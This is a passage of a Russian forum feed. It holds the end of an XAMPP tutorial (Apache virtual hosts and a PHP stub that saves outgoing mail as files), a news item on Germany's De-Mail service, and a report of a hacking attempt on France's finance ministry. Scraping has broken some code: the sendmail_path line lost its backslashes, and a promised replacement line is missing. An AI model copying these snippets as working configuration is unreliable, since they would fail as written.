webmaster@blog.local DocumentRoot &quot;C:\my_projects\blog.local\www&quot; ServerName blog.local ServerAlias www.blog.local ErrorLog &quot;C:\my_projects\blog.local\logs\error.log&quot; CustomLog &quot;C:\my_projects\blog.local\logs\access.log&quot; combined &lt;Directory &quot;C:\my_projects\blog.local\www&quot;&gt; AllowOverride All Order allow,deny Allow from all &lt;/Directory&gt; &lt;/VirtualHost&gt; &lt;VirtualHost *:80&gt; ServerAdmin webmaster@site.local DocumentRoot &quot;C:\my_projects\site.local\www&quot; ServerName site.local ServerAlias www.site.local ErrorLog &quot;C:\my_projects\site.local\logs\error.log&quot; CustomLog &quot;C:\my_projects\site.local\logs\access.log&quot; combined &lt;Directory &quot;C:\my_projects\site.local\www&quot;&gt; AllowOverride All Order allow,deny Allow from all &lt;/Directory&gt; &lt;/VirtualHost&gt;</pre></div></div></div><p>Также не забываем добавить следующие строчки в файл hosts в папке Windows:<br />127.0.0.1 site.local<br />127.0.0.1 wwwsite.local</p> <p>Перезапускаем Apache и новый хост готов для работы.</p> <p>По аналогии можно добавить сколько угодно виртуальных хостов.</p> <p><span style="color: green">Немного справочной информации относительно того, что мы добавляем в файл httpd-vhosts.conf:</span><br />ServerAdmin webmaster@blog.local — e-mail-адрес администратора веб-сервера;<br />DocumentRoot &quot;C:\my_projects\blog.local\www&quot; — путь к папке с сайтом;<br />ServerName blog.local — название сайта, которое набирается в браузере, может иметь любое значение, например blog или blog.ru;<br />ServerAlias wwwblog.local — адрес по которому сайт также должен открываться;<br />ErrorLog &quot;C:\my_projects\blog.local\logs\error.log&quot; — журнал ошибок;<br />CustomLog &quot;C:\my_projects\blog.local\logs\access.log&quot; combined — журнал доступа к сайту, кто и когда заходил на сайт и с какого браузера, combined — означает, что отчет будет более информативным, можно заменить значением common (менее информативно);</p> <p>&lt;Directory &quot;C:\my_projects\blog.local\www&quot;&gt;<br />AllowOverride All<br />Order allow,deny<br />Allow from all<br />&lt;/Directory&gt;</p> <p>Приведенная выше конструкция разрешает отображение всех файлов в указанной директории и назначает максимально возможные привилегии (без AllowOverride All не будут работать ЧПУ).</p> <p>Если делали все внимательно, то создание новых сайтов на виртуальном сервере не составит для вас труда, ошибки могут быть из-за синтаксиса, к примеру если вы допустите ошибку в httpd-vhosts.conf, Apache может просто не запустится. Для анализа ошибок воспользйтесь логами Apache, файл error.txt расположенный в по адресу C:\xampp\apache\logs.</p> <p><span style="color: green">«Отладочная заглушка» для sendmail</span></p> <p>Если вы пользовались Denwer-ом, то помните, что все письма с локального сайта отправлялись в папку sendmail, это достаточно удобно, но в XAMPP такой функции не предусмотрено, в XAMPP есть собственный почтовый сервер, но он потребует немало времени, чтобы с ним разобраться.</p> <p>С помощью описанной ниже инструкции, вы сможете создать такую же «заглушку» как и в Denwer.</p> <p>1. В папке sendmail (C:\xampp\sendmail) создадим файл sendmail.php с кодом:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 35em"><pre>&lt;?php define('DIR','c:/xampp/tmp/sendmail/'); $stream = ''; $fp = fopen('php://stdin','r'); while($t=fread($fp,2048)) { if( $t===chr(0) ) break; $stream .= $t; } fclose($fp); $fp = fopen(mkname(),'w'); fwrite($fp,$stream); fclose($fp); function mkname($i=0) { $fn = DIR.date('Y-m-d_H-i-s_').$i.'.eml'; if ( file_exists($fn) ) return mkname(++$i); else return $fn; } ?&gt;</pre></div></div></div><p>В моем случае предполагается получение писем в кодировке UTF-8, если вы хотите получать письма в в кодировке CP1251, то замените строчку:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>fwrite($fp,$stream);</pre></div></div></div><p>2. В файле php.ini (C:\xampp\php) заменяем строчку:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>sendmail_path = &quot;C:\xampp\sendmail\sendmail.exe -t&quot;</pre></div></div></div><p>на строчку:</p><div class="code-box"><strong class="legend">Код:</strong><div class="blockcode"><div class="scrollbox" style="height: 4.5em"><pre>sendmail_path = C:xamppphpphp.exe c:xamppsendmailsendmail.php</pre></div></div></div><p>Строка должна быть раскомментирована (убрать символ точки с запятой «;» в начале строки).</p> <p>3. Создадим папку sendmail в папке tmp (C:\xampp\tmp\sendmail).</p> <p>4. Перезапускаем сервер Apache и теперь все отправленные письма будут в папке C:\xampp\tmp\sendmail</p> <p>Дополнительная информация по XAMPP.</p> <p>Расположение конфигурационных файлов:<br />Apache Grundkonfiguration: .\xampp\apache\conf\httpd.conf<br />Apache SSL: .\xampp\apache\conf\ssl.conf<br />Apache Perl (nur mit Addon): .\xampp\apache\conf\perl.conf<br />Apache Tomcat (nur mit Addon): .\xampp\apache\conf\java.conf<br />Apache Python (nur mit Addon): .\xampp\apache\conf\python.conf<br />PHP: .\xampp\apache\conf\php.ini (der aktuell benutzten Version)<br />MySQL: .\xampp\mysql\bin\my.cnf<br />phpMyAdmin: .\xampp\phpMyAdmin\config.inc.php<br />FileZilla FTP: .\xampp\FileZillaFTP\FileZilla Server.xml<br />Mercury Mail Grundkonfiguration: .\xampp\MercuryMail\MERCURY.INI<br />Sendmail: .\xampp\sendmail\sendmail.ini</p> mybb@mybb.ru (administrator) Mon, 07 Mar 2011 23:47:48 +0300 https://forumis.fludilka.su/viewtopic.php?pid=4#p4 https://forumis.fludilka.su/viewtopic.php?pid=3#p3 <p><strong>Наиболее эффективный механизм борьбы со спамом известен: нужно создать такие условия, когда отправка миллионов электронных сообщений станет для отправителя экономически затратной. Либо нужно создать сверхжесткую систему аутентификации почтового трафика, чтобы каждое письмо имело существующего отправителя и получателя. Именно последнее и собираются сделать в Германии.</p> <p>Система электронной почты De-Mail представляет собой правительственный сервис, в котором абсолютно все сообщения шифруются и имеют цифровую подпись, что позволяет им избежать перехвата и/или подделки во время транзита. Бизнес и обычные пользователи, желающие работать с De-Mail, должны будут подтверждать свою реальную аутентичность и запрашивать такую же аутентичность у своего получателя сообщения. Поставлять услуги De-Mail в масштабах Германии может любой провайдер, но для этого он должен пройти сертификацию и установить требуемую систему на свои серверы.</p> <p>В Берлине говорят, что пока технические детали De-Mail находятся на согласовании и утверждении, но к концу марта должно начаться практическое внедрение разработки. Уже сейчас в сервисе предусмотрена опциональная возможность взимания платы за отправляемое сообщение, впрочем, эта функция не является обязательной.</p> <p>Немецкие разработчики сервиса говорят, что борьба со спамом не является основной задачей De-Mail - сервис провайдеры могут работать с De-Mail, но доставлять получателям электронные сообщения также как и обычные системы электронной почты. В то же время, даже в самом лояльном режиме работы сервис будет требовать явной аутентификации отправителя сообщения, что уже ставит значительный заслон на пути спамеров. Конечно, полностью от спама не избавляет и это, но в данном случае спамерам придется создавать тысячи электронных адресов, что само по себе трудно и затратно, причем для успеха кампании каждые новые кампании придется проводить с новых ящиков.</p> <p>Система подделки адресов (email-спуффинг) здесь также не работает, из-за той же явной требовательности к аутентичности ящика и владельца. Конечно, и это можно обойти, но тогда спамерам придется создавать совершенно новые базы данных, работа над которыми в разы труднее и дороже.</p> <p>Юридически, в Германии электронные письма, рассылаемые через De-Mail, имеют статус официальных бумажных документов, говорят авторы системы. С технической точки зрения, De-Mail базируется на обычных интернет-стандартах - передача писем идет через SMTP, отвечающим только за коммуникацию (но не за идентификацию).</p> <p>На этой неделе телекоммуникационный оператор Deutsche Telekom, поставщик корпоративных email-сервисов Mentana Claimsoft, интернет-провайдер United Internet и другие немецкие компании объявили о поддержке нового сервиса. В совместном заявлении сторон говорится, что несмотря на обособленность De-Mail с точки зрения безопасности, работать с ним с точки зрения клиента будет также просто, как с обычным email.</strong></p> mybb@mybb.ru (administrator) Mon, 07 Mar 2011 22:55:32 +0300 https://forumis.fludilka.su/viewtopic.php?pid=3#p3 https://forumis.fludilka.su/viewtopic.php?pid=2#p2 <p><strong>Министерство финансов Франции сегодня подтвердило появившиеся в парижской прессе сведения, согласно которым ведомство в декабре прошлого года подверглось серьезной хакерской атаке, целью которой было похищение материалов саммита G20, проводившегося в Париже в феврале этого года. Министр финансов Франции Франсуа Баронин говорит, что хакерская атака действительно была, но она была отражена и документы не попали в руки атакующих.</p> <p>Сегодня утром французский журнал Paris Match сообщил, что французские организаторы саммита подверглись атаке хакеров, тогда как сами злоумышленники пытались похитить документы, подготовленные страной к официальному мероприятию. Интересовали злоумышленников также внутренние французские материалы и различные международные файлы.</p> <p>В рамках расследования было установлено, что всего в рамках атаки хакеры попытались получить доступ или получили его к 150 компьютерам. &quot;Мы заметили, что некоторая часть информации начала перенаправляться на интернет-узлы в Китае. Хотя само по себе это мало о чем говорит, нас это заинтересовало&quot;, - говорит неназванный источник в интервью журналу.</p> <p>Paris Match также сообщает, что собранные доказательства были направлены в секретные службы Франции и в парижский суд. &quot;Нет сомнений, что атаковавшие были профессионалами и они были очень хорошо организованы, - говорит Патрик Паиллу, генеральный директор Французского национального агентства по ИТ-безопасности. - С атакой такого уровня мы столкнулись впервые&quot;.</p> <p>На саммите G20 в феврале обсуждались цели, необходимые для снижения дисбаланса в глобальной экономике, а также стратегия развития монетарной политики ведущих национальных банков. Данный вопрос, с учетом развития мировых тенденций, был особенно важен для Китая. Многие страны обвиняют Китай в том, что страна намеренно скупает триллионы долларов, дабы удержать на низком курсе котировки юаня, а также получить искусственные преимущества в торговле.</strong></p> mybb@mybb.ru (administrator) Mon, 07 Mar 2011 22:49:09 +0300 https://forumis.fludilka.su/viewtopic.php?pid=2#p2